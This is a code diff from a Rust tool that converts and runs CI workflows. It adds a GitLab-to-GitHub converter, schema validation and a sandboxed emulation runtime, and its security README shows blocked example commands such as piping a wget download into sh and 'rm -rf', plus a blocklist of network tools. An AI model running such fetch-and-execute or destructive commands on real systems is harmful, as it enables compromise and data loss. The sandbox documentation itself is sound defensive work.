// Convert each GitLab job to a GitHub Actions job
|
||||
for (job_name, gitlab_job) in &pipeline.jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = gitlab_job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Create a new job
|
||||
let mut job = workflow::Job {
|
||||
runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
|
||||
needs: None,
|
||||
steps: Vec::new(),
|
||||
env: HashMap::new(),
|
||||
matrix: None,
|
||||
services: HashMap::new(),
|
||||
if_condition: None,
|
||||
outputs: None,
|
||||
permissions: None,
|
||||
uses: None,
|
||||
with: None,
|
||||
secrets: None,
|
||||
};
|
||||
|
||||
// Add job-specific environment variables
|
||||
if let Some(variables) = &gitlab_job.variables {
|
||||
job.env.extend(variables.clone());
|
||||
}
|
||||
|
||||
// Add global variables if they exist
|
||||
if let Some(variables) = &pipeline.variables {
|
||||
// Only add if not already defined at job level
|
||||
for (key, value) in variables {
|
||||
job.env.entry(key.clone()).or_insert_with(|| value.clone());
|
||||
}
|
||||
}
|
||||
|
||||
// Convert before_script to steps if it exists
|
||||
if let Some(before_script) = &gitlab_job.before_script {
|
||||
for (i, cmd) in before_script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("Before script {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: None,
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Convert main script to steps
|
||||
if let Some(script) = &gitlab_job.script {
|
||||
for (i, cmd) in script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("Run script line {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: None,
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Convert after_script to steps if it exists
|
||||
if let Some(after_script) = &gitlab_job.after_script {
|
||||
for (i, cmd) in after_script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("After script {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: Some(true), // After script should continue even if previous steps fail
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Add services if they exist
|
||||
if let Some(services) = &gitlab_job.services {
|
||||
for (i, service) in services.iter().enumerate() {
|
||||
let service_name = format!("service-{}", i);
|
||||
let service_image = match service {
|
||||
wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
|
||||
wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
|
||||
};
|
||||
|
||||
let service = workflow::Service {
|
||||
image: service_image,
|
||||
ports: None,
|
||||
env: HashMap::new(),
|
||||
volumes: None,
|
||||
options: None,
|
||||
};
|
||||
|
||||
job.services.insert(service_name, service);
|
||||
}
|
||||
}
|
||||
|
||||
// Add the job to the workflow
|
||||
workflow.jobs.insert(job_name.clone(), job);
|
||||
}
|
||||
|
||||
workflow
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
// use std::path::PathBuf; // unused
|
||||
use tempfile::NamedTempFile;
|
||||
|
||||
#[test]
|
||||
fn test_parse_simple_pipeline() {
|
||||
// Create a temporary file with a simple GitLab CI/CD pipeline
|
||||
let file = NamedTempFile::new().unwrap();
|
||||
let content = r#"
|
||||
stages:
|
||||
- build
|
||||
- test
|
||||
|
||||
build_job:
|
||||
stage: build
|
||||
script:
|
||||
- echo "Building..."
|
||||
- make build
|
||||
|
||||
test_job:
|
||||
stage: test
|
||||
script:
|
||||
- echo "Testing..."
|
||||
- make test
|
||||
"#;
|
||||
fs::write(&file, content).unwrap();
|
||||
|
||||
// Parse the pipeline
|
||||
let pipeline = parse_pipeline(&file.path()).unwrap();
|
||||
|
||||
// Validate basic structure
|
||||
assert_eq!(pipeline.stages.as_ref().unwrap().len(), 2);
|
||||
assert_eq!(pipeline.jobs.len(), 2);
|
||||
|
||||
// Check job contents
|
||||
let build_job = pipeline.jobs.get("build_job").unwrap();
|
||||
assert_eq!(build_job.stage.as_ref().unwrap(), "build");
|
||||
assert_eq!(build_job.script.as_ref().unwrap().len(), 2);
|
||||
|
||||
let test_job = pipeline.jobs.get("test_job").unwrap();
|
||||
assert_eq!(test_job.stage.as_ref().unwrap(), "test");
|
||||
assert_eq!(test_job.script.as_ref().unwrap().len(), 2);
|
||||
}
|
||||
}
|
||||
@@ -1,2 +1,5 @@
|
||||
// parser crate
|
||||
|
||||
pub mod gitlab;
|
||||
pub mod schema;
|
||||
pub mod workflow;
|
||||
111
crates/parser/src/schema.rs
Normal file
111
crates/parser/src/schema.rs
Normal file
@@ -0,0 +1,111 @@
|
||||
use jsonschema::JSONSchema;
|
||||
use serde_json::Value;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
|
||||
const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");
|
||||
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub enum SchemaType {
|
||||
GitHub,
|
||||
GitLab,
|
||||
}
|
||||
|
||||
pub struct SchemaValidator {
|
||||
github_schema: JSONSchema,
|
||||
gitlab_schema: JSONSchema,
|
||||
}
|
||||
|
||||
impl SchemaValidator {
|
||||
pub fn new() -> Result<Self, String> {
|
||||
let github_schema_json: Value = serde_json::from_str(GITHUB_WORKFLOW_SCHEMA)
|
||||
.map_err(|e| format!("Failed to parse GitHub workflow schema: {}", e))?;
|
||||
|
||||
let gitlab_schema_json: Value = serde_json::from_str(GITLAB_CI_SCHEMA)
|
||||
.map_err(|e| format!("Failed to parse GitLab CI schema: {}", e))?;
|
||||
|
||||
let github_schema = JSONSchema::compile(&github_schema_json)
|
||||
.map_err(|e| format!("Failed to compile GitHub JSON schema: {}", e))?;
|
||||
|
||||
let gitlab_schema = JSONSchema::compile(&gitlab_schema_json)
|
||||
.map_err(|e| format!("Failed to compile GitLab JSON schema: {}", e))?;
|
||||
|
||||
Ok(Self {
|
||||
github_schema,
|
||||
gitlab_schema,
|
||||
})
|
||||
}
|
||||
|
||||
pub fn validate_workflow(&self, workflow_path: &Path) -> Result<(), String> {
|
||||
// Determine the schema type based on the filename
|
||||
let schema_type = if workflow_path.file_name().is_some_and(|name| {
|
||||
let name_str = name.to_string_lossy();
|
||||
name_str.ends_with(".gitlab-ci.yml") || name_str.ends_with(".gitlab-ci.yaml")
|
||||
}) {
|
||||
SchemaType::GitLab
|
||||
} else {
|
||||
SchemaType::GitHub
|
||||
};
|
||||
|
||||
// Read the workflow file
|
||||
let content = fs::read_to_string(workflow_path)
|
||||
.map_err(|e| format!("Failed to read workflow file: {}", e))?;
|
||||
|
||||
// Parse YAML to JSON Value
|
||||
let workflow_json: Value = serde_yaml::from_str(&content)
|
||||
.map_err(|e| format!("Failed to parse workflow YAML: {}", e))?;
|
||||
|
||||
// Validate against the appropriate schema
|
||||
let validation_result = match schema_type {
|
||||
SchemaType::GitHub => self.github_schema.validate(&workflow_json),
|
||||
SchemaType::GitLab => self.gitlab_schema.validate(&workflow_json),
|
||||
};
|
||||
|
||||
// Handle validation errors
|
||||
if let Err(errors) = validation_result {
|
||||
let schema_name = match schema_type {
|
||||
SchemaType::GitHub => "GitHub workflow",
|
||||
SchemaType::GitLab => "GitLab CI",
|
||||
};
|
||||
let mut error_msg = format!("{} validation failed:\n", schema_name);
|
||||
for error in errors {
|
||||
error_msg.push_str(&format!("- {}\n", error));
|
||||
}
|
||||
return Err(error_msg);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn validate_with_specific_schema(
|
||||
&self,
|
||||
content: &str,
|
||||
schema_type: SchemaType,
|
||||
) -> Result<(), String> {
|
||||
// Parse YAML to JSON Value
|
||||
let workflow_json: Value =
|
||||
serde_yaml::from_str(content).map_err(|e| format!("Failed to parse YAML: {}", e))?;
|
||||
|
||||
// Validate against the appropriate schema
|
||||
let validation_result = match schema_type {
|
||||
SchemaType::GitHub => self.github_schema.validate(&workflow_json),
|
||||
SchemaType::GitLab => self.gitlab_schema.validate(&workflow_json),
|
||||
};
|
||||
|
||||
// Handle validation errors
|
||||
if let Err(errors) = validation_result {
|
||||
let schema_name = match schema_type {
|
||||
SchemaType::GitHub => "GitHub workflow",
|
||||
SchemaType::GitLab => "GitLab CI",
|
||||
};
|
||||
let mut error_msg = format!("{} validation failed:\n", schema_name);
|
||||
for error in errors {
|
||||
error_msg.push_str(&format!("- {}\n", error));
|
||||
}
|
||||
return Err(error_msg);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
@@ -1,11 +1,51 @@
|
||||
use crate::matrix::MatrixConfig;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde::{Deserialize, Deserializer, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use wrkflw_matrix::MatrixConfig;
|
||||
|
||||
use super::schema::SchemaValidator;
|
||||
|
||||
// Custom deserializer for needs field that handles both string and array formats
|
||||
fn deserialize_needs<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
|
||||
where
|
||||
D: Deserializer<'de>,
|
||||
{
|
||||
#[derive(Deserialize)]
|
||||
#[serde(untagged)]
|
||||
enum StringOrVec {
|
||||
String(String),
|
||||
Vec(Vec<String>),
|
||||
}
|
||||
|
||||
let value = Option::<StringOrVec>::deserialize(deserializer)?;
|
||||
match value {
|
||||
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
|
||||
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
|
||||
None => Ok(None),
|
||||
}
|
||||
}
|
||||
|
||||
// Custom deserializer for runs-on field that handles both string and array formats
|
||||
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
|
||||
where
|
||||
D: Deserializer<'de>,
|
||||
{
|
||||
#[derive(Deserialize)]
|
||||
#[serde(untagged)]
|
||||
enum StringOrVec {
|
||||
String(String),
|
||||
Vec(Vec<String>),
|
||||
}
|
||||
|
||||
let value = Option::<StringOrVec>::deserialize(deserializer)?;
|
||||
match value {
|
||||
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
|
||||
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
|
||||
None => Ok(None),
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct WorkflowDefinition {
|
||||
pub name: String,
|
||||
@@ -18,10 +58,11 @@ pub struct WorkflowDefinition {
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct Job {
|
||||
#[serde(rename = "runs-on")]
|
||||
pub runs_on: String,
|
||||
#[serde(default)]
|
||||
#[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
|
||||
pub runs_on: Option<Vec<String>>,
|
||||
#[serde(default, deserialize_with = "deserialize_needs")]
|
||||
pub needs: Option<Vec<String>>,
|
||||
#[serde(default)]
|
||||
pub steps: Vec<Step>,
|
||||
#[serde(default)]
|
||||
pub env: HashMap<String, String>,
|
||||
@@ -29,6 +70,19 @@ pub struct Job {
|
||||
pub matrix: Option<MatrixConfig>,
|
||||
#[serde(default)]
|
||||
pub services: HashMap<String, Service>,
|
||||
#[serde(default, rename = "if")]
|
||||
pub if_condition: Option<String>,
|
||||
#[serde(default)]
|
||||
pub outputs: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub permissions: Option<HashMap<String, String>>,
|
||||
// Reusable workflow (job-level 'uses') support
|
||||
#[serde(default)]
|
||||
pub uses: Option<String>,
|
||||
#[serde(default)]
|
||||
pub with: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub secrets: Option<serde_yaml::Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
29
crates/runtime/Cargo.toml
Normal file
29
crates/runtime/Cargo.toml
Normal file
@@ -0,0 +1,29 @@
|
||||
[package]
|
||||
name = "wrkflw-runtime"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Runtime execution environment for wrkflw workflow engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
once_cell = "1.19"
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
tempfile = "3.9"
|
||||
tokio.workspace = true
|
||||
futures = "0.3"
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
which = "4.4"
|
||||
regex = "1.10"
|
||||
thiserror = "1.0"
|
||||
13
crates/runtime/README.md
Normal file
13
crates/runtime/README.md
Normal file
@@ -0,0 +1,13 @@
|
||||
## wrkflw-runtime
|
||||
|
||||
Runtime abstractions for executing steps in containers or emulation.
|
||||
|
||||
- Container management primitives used by the executor
|
||||
- Emulation mode helpers (run on host without containers)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
// This crate is primarily consumed by `wrkflw-executor`.
|
||||
// Prefer using the executor API instead of calling runtime directly.
|
||||
```
|
||||
258
crates/runtime/README_SECURITY.md
Normal file
258
crates/runtime/README_SECURITY.md
Normal file
@@ -0,0 +1,258 @@
|
||||
# Security Features in wrkflw Runtime
|
||||
|
||||
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
|
||||
|
||||
## Overview
|
||||
|
||||
The wrkflw runtime provides multiple execution modes with varying levels of security:
|
||||
|
||||
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
|
||||
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
|
||||
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
|
||||
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
|
||||
|
||||
## Security Modes
|
||||
|
||||
### 🔒 Secure Emulation Mode (Recommended for Local Development)
|
||||
|
||||
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
|
||||
|
||||
#### Features
|
||||
|
||||
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
|
||||
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
|
||||
- **Resource Limits**: Enforces CPU, memory, and execution time limits
|
||||
- **Filesystem Isolation**: Restricts file access to allowed paths only
|
||||
- **Environment Sanitization**: Filters dangerous environment variables
|
||||
- **Process Monitoring**: Tracks and limits spawned processes
|
||||
|
||||
#### Usage
|
||||
|
||||
```bash
|
||||
# Use secure emulation mode (recommended)
|
||||
wrkflw run --runtime secure-emulation .github/workflows/build.yml
|
||||
|
||||
# Or via TUI
|
||||
wrkflw tui --runtime secure-emulation
|
||||
```
|
||||
|
||||
#### Command Whitelist/Blacklist
|
||||
|
||||
**Allowed Commands (Safe):**
|
||||
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
|
||||
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
|
||||
- Build tools: `make`, `cmake`, `javac`, `dotnet`
|
||||
|
||||
**Blocked Commands (Dangerous):**
|
||||
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
|
||||
- Network tools: `wget`, `curl`, `ssh`, `nc`
|
||||
- Process control: `kill`, `killall`, `systemctl`
|
||||
|
||||
#### Resource Limits
|
||||
|
||||
```rust
|
||||
// Default configuration
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512, // 512 MB
|
||||
max_cpu_percent: 80, // 80% CPU
|
||||
max_processes: 10, // Max 10 processes
|
||||
allow_network: false, // No network access
|
||||
strict_mode: true, // Whitelist-only mode
|
||||
}
|
||||
```
|
||||
|
||||
### ⚠️ Legacy Emulation Mode (Unsafe)
|
||||
|
||||
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**
|
||||
|
||||
```bash
|
||||
# Legacy unsafe mode (not recommended)
|
||||
wrkflw run --runtime emulation .github/workflows/build.yml
|
||||
```
|
||||
|
||||
## Example: Blocked vs Allowed Commands
|
||||
|
||||
### ❌ Blocked Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will be blocked in secure emulation mode
|
||||
steps:
|
||||
- name: Dangerous command
|
||||
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
|
||||
|
||||
- name: System modification
|
||||
run: sudo apt-get install package # BLOCKED: sudo usage
|
||||
|
||||
- name: Network access
|
||||
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
|
||||
```
|
||||
|
||||
### ✅ Allowed Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will run successfully in secure emulation mode
|
||||
steps:
|
||||
- name: Build project
|
||||
run: cargo build --release # ALLOWED: Development tool
|
||||
|
||||
- name: Run tests
|
||||
run: cargo test # ALLOWED: Testing
|
||||
|
||||
- name: List files
|
||||
run: ls -la target/ # ALLOWED: Safe file listing
|
||||
|
||||
- name: Format code
|
||||
run: cargo fmt --check # ALLOWED: Code formatting
|
||||
```
|
||||
|
||||
## Security Warnings and Messages
|
||||
|
||||
When dangerous commands are detected, wrkflw provides clear security messages:
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
|
||||
This command was blocked for security reasons.
|
||||
If you need to run this command, please use Docker or Podman mode instead.
|
||||
```
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
|
||||
This command was blocked because it matches a known dangerous pattern.
|
||||
Please review your workflow for potentially harmful commands.
|
||||
```
|
||||
|
||||
## Configuration Examples
|
||||
|
||||
### Workflow-Friendly Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
|
||||
|
||||
let config = create_workflow_sandbox_config();
|
||||
// - Allows network access for package downloads
|
||||
// - Higher resource limits for CI/CD workloads
|
||||
// - Less strict mode for development flexibility
|
||||
```
|
||||
|
||||
### Strict Security Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
|
||||
|
||||
let config = create_strict_sandbox_config();
|
||||
// - No network access
|
||||
// - Very limited command set
|
||||
// - Low resource limits
|
||||
// - Strict whitelist-only mode
|
||||
```
|
||||
|
||||
### Custom Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
|
||||
use std::collections::HashSet;
|
||||
use std::path::PathBuf;
|
||||
|
||||
let mut config = SandboxConfig::default();
|
||||
|
||||
// Custom allowed commands
|
||||
config.allowed_commands = ["echo", "ls", "cargo"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
// Custom resource limits
|
||||
config.max_execution_time = Duration::from_secs(60);
|
||||
config.max_memory_mb = 256;
|
||||
|
||||
// Custom allowed paths
|
||||
config.allowed_write_paths.insert(PathBuf::from("./target"));
|
||||
config.allowed_read_paths.insert(PathBuf::from("./src"));
|
||||
|
||||
let sandbox = Sandbox::new(config)?;
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### From Unsafe Emulation to Secure Emulation
|
||||
|
||||
1. **Change Runtime Flag**:
|
||||
```bash
|
||||
# Old (unsafe)
|
||||
wrkflw run --runtime emulation workflow.yml
|
||||
|
||||
# New (secure)
|
||||
wrkflw run --runtime secure-emulation workflow.yml
|
||||
```
|
||||
|
||||
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
|
||||
|
||||
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
|
||||
- Using Docker/Podman mode for those specific workflows
|
||||
- Modifying the workflow to use allowed alternatives
|
||||
- Creating a custom sandbox configuration
|
||||
|
||||
### When to Use Each Mode
|
||||
|
||||
| Use Case | Recommended Mode | Reason |
|
||||
|----------|------------------|---------|
|
||||
| Local development | Secure Emulation | Good balance of security and convenience |
|
||||
| Untrusted workflows | Docker/Podman | Maximum isolation |
|
||||
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
|
||||
| Testing workflows | Secure Emulation | Fast execution with safety |
|
||||
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Command Blocked Error
|
||||
|
||||
If you encounter a security block:
|
||||
|
||||
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
|
||||
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
|
||||
3. **Modify the workflow**: Use safer alternatives where possible
|
||||
|
||||
### Resource Limit Exceeded
|
||||
|
||||
If your workflow hits resource limits:
|
||||
|
||||
1. **Optimize the workflow**: Reduce resource usage where possible
|
||||
2. **Use custom configuration**: Increase limits for specific use cases
|
||||
3. **Use container mode**: For resource-intensive workflows
|
||||
|
||||
### Path Access Denied
|
||||
|
||||
If file access is denied:
|
||||
|
||||
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
|
||||
2. **Use relative paths**: Work within the project directory
|
||||
3. **Use container mode**: For workflows requiring system-wide file access
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default to Secure Mode**: Use secure emulation mode by default for local development
|
||||
2. **Test Workflows**: Always test workflows in secure mode before deploying
|
||||
3. **Review Security Messages**: Pay attention to security blocks and warnings
|
||||
4. **Use Containers for Production**: Use Docker/Podman for production deployments
|
||||
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
|
||||
|
||||
## Security Considerations
|
||||
|
||||
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
|
||||
- For maximum security with untrusted code, always use container modes
|
||||
- The sandbox is most effective against script errors and typos that could damage your system
|
||||
- Always review workflows from untrusted sources before execution
|
||||
|
||||
## Contributing Security Improvements
|
||||
|
||||
If you find security issues or have suggestions for improvements:
|
||||
|
||||
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
|
||||
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
|
||||
3. **Test Edge Cases**: Help us identify bypass techniques
|
||||
4. **Documentation**: Improve security documentation and examples
|
||||
|
||||
---
|
||||
|
||||
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).
|
||||
@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
|
||||
) -> Result<String, ContainerError>;
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct ContainerOutput {
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
@@ -1,5 +1,4 @@
|
||||
use crate::logging;
|
||||
use crate::runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use async_trait::async_trait;
|
||||
use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
@@ -8,6 +7,8 @@ use std::path::{Path, PathBuf};
|
||||
use std::process::Command;
|
||||
use std::sync::Mutex;
|
||||
use tempfile::TempDir;
|
||||
use which;
|
||||
use wrkflw_logging;
|
||||
|
||||
// Global collection of resources to clean up
|
||||
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -160,36 +161,113 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
command_str.push_str(part);
|
||||
}
|
||||
|
||||
// Log the command being executed
|
||||
logging::info(&format!("Executing command in container: {}", command_str));
|
||||
// Log more detailed debugging information
|
||||
wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
|
||||
wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::info(&format!("Command length: {}", command.len()));
|
||||
|
||||
// Special handling for Rust/Cargo actions
|
||||
if command_str.contains("rust") || command_str.contains("cargo") {
|
||||
logging::debug(&format!("Executing Rust command: {}", command_str));
|
||||
if command.is_empty() {
|
||||
return Err(ContainerError::ContainerExecution(
|
||||
"Empty command array".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let mut cmd = Command::new("cargo");
|
||||
let parts = command_str.split_whitespace().collect::<Vec<&str>>();
|
||||
// Print each command part separately for debugging
|
||||
for (i, part) in command.iter().enumerate() {
|
||||
wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
|
||||
}
|
||||
|
||||
let current_dir = working_dir.to_str().unwrap_or(".");
|
||||
cmd.current_dir(current_dir);
|
||||
// Log environment variables
|
||||
wrkflw_logging::info("Environment variables:");
|
||||
for (key, value) in env_vars {
|
||||
wrkflw_logging::info(&format!(" {}={}", key, value));
|
||||
}
|
||||
|
||||
// Find actual working directory - determine if we should use the current directory instead
|
||||
let actual_working_dir: PathBuf = if !working_dir.exists() {
|
||||
// Look for GITHUB_WORKSPACE or CI_PROJECT_DIR in env_vars
|
||||
let mut workspace_path = None;
|
||||
for (key, value) in env_vars {
|
||||
if *key == "GITHUB_WORKSPACE" || *key == "CI_PROJECT_DIR" {
|
||||
workspace_path = Some(PathBuf::from(value));
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// If found, use that as the working directory
|
||||
if let Some(path) = workspace_path {
|
||||
if path.exists() {
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using environment-defined workspace: {}",
|
||||
path.display()
|
||||
));
|
||||
path
|
||||
} else {
|
||||
// Fallback to current directory
|
||||
let current_dir =
|
||||
std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
current_dir
|
||||
}
|
||||
} else {
|
||||
// Fallback to current directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
current_dir
|
||||
}
|
||||
} else {
|
||||
working_dir.to_path_buf()
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using actual working directory: {}",
|
||||
actual_working_dir.display()
|
||||
));
|
||||
|
||||
// Check if path contains the command (for shell script execution)
|
||||
let command_path = which::which(command[0]);
|
||||
match &command_path {
|
||||
Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
|
||||
Err(e) => wrkflw_logging::error(&format!(
|
||||
"Command not found in PATH: {} - Error: {}",
|
||||
command[0], e
|
||||
)),
|
||||
}
|
||||
|
||||
// First, check if this is a simple shell command (like echo)
|
||||
if command_str.starts_with("echo ")
|
||||
|| command_str.starts_with("cp ")
|
||||
|| command_str.starts_with("mkdir ")
|
||||
|| command_str.starts_with("mv ")
|
||||
{
|
||||
wrkflw_logging::info("Executing as shell command");
|
||||
// Execute as a shell command
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(&actual_working_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
|
||||
// Add command arguments
|
||||
if parts.len() > 1 {
|
||||
cmd.args(&parts[1..]);
|
||||
}
|
||||
|
||||
match cmd.output() {
|
||||
Ok(output_result) => {
|
||||
let exit_code = output_result.status.code().unwrap_or(-1);
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Shell command completed with exit code: {}",
|
||||
exit_code
|
||||
));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -200,7 +278,94 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("RUST") {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("CI_") {
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
|
||||
return Err(ContainerError::ContainerExecution(error_details));
|
||||
}
|
||||
|
||||
return Ok(ContainerOutput {
|
||||
stdout: output,
|
||||
stderr: error,
|
||||
exit_code,
|
||||
});
|
||||
}
|
||||
Err(e) => {
|
||||
return Err(ContainerError::ContainerExecution(format!(
|
||||
"Failed to execute command: {}\nError: {}",
|
||||
command_str, e
|
||||
)));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Special handling for Rust/Cargo commands
|
||||
if command_str.starts_with("cargo ") || command_str.starts_with("rustup ") {
|
||||
let parts: Vec<&str> = command_str.split_whitespace().collect();
|
||||
if parts.is_empty() {
|
||||
return Err(ContainerError::ContainerExecution(
|
||||
"Empty command".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let mut cmd = Command::new(parts[0]);
|
||||
|
||||
// Always use the current directory for cargo/rust commands rather than the temporary directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using project directory for Rust command: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
